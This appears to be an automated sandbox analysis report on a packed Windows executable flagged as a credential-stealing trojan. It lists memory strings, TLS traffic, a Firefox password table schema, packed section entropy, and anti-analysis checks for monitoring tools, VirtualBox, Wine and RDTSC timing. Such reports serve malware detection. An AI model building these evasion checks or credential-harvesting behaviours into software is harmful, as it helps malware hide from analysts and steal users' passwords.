            Source: file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 
00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: file.exe, 00000000.00000003.1074715136.00000000054EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: file.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
            Source: file.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
            Source: file.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132235158.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49682 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49683 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49684 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49685 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49686 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49688 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49693 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49694 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49695 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49696 version: TLS 1.2

            System Summary

            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: udvczyhg ZLIB complexity 0.9945707461371137
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000000.00000003.954051096.0000000005407000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1010545555.0000000005417000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.954614271.00000000053E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeVirustotal: Detection: 64%
            Source: file.exeReversingLabs: Detection: 60%
            Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: file.exeStatic file information: File size 2111488 > 1048576
            Source: file.exeStatic PE information: Raw size of udvczyhg is bigger than: 0x100000 < 0x1a0a00

            Data Obfuscation

            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;udvczyhg:EW;wrnawoey:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;udvczyhg:EW;wrnawoey:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x206218 should be: 0x212dff
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: udvczyhg
            Source: file.exeStatic PE information: section name: wrnawoey
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB62 pushad ; retf 0_3_00B0CB65
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB66 push 6800B0CBh; retf 0_3_00B0CB6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB52 push eax; retf 0_3_00B0CB55
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB5E pushad ; retf 0_3_00B0CB61
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB4E push eax; retf 0_3_00B0CB51
            Source: file.exeStatic PE information: section name: entropy: 7.1961402952181865
            Source: file.exeStatic PE information: section name: udvczyhg entropy: 7.954347737644204

            Boot Survival

            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28617D second address: 286181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423E52 second address: 423E73 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F2E7D257EC8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423E73 second address: 423E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D343Fh 0x00000009 jmp 00007F2E7D1D3444h 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423E9B second address: 423EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2E7D257EB6h 0x0000000a je 00007F2E7D257EB6h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423EAB second address: 423EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3446h 0x00000007 jmp 00007F2E7D1D3449h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242A4 second address: 4242D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC6h 0x00000007 js 00007F2E7D257EB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2E7D257EC0h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242D4 second address: 4242DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2E7D1D3436h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242DE second address: 4242E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242E2 second address: 4242FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2E7D1D3436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F2E7D1D3436h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4242FB second address: 4242FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424469 second address: 4244D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3443h 0x00000009 jmp 00007F2E7D1D3445h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F2E7D1D3447h 0x00000018 jl 00007F2E7D1D3436h 0x0000001e jbe 00007F2E7D1D3436h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F2E7D1D3443h 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4244D3 second address: 4244E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 419684 second address: 41969D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3440h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41969D second address: 4196B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EC4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4196B5 second address: 4196B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 429D7F second address: 429D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 429D8E second address: 429D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 429E92 second address: 429E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 429E96 second address: 429EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F2E7D1D3436h 0x00000014 popad 0x00000015 rdtsc
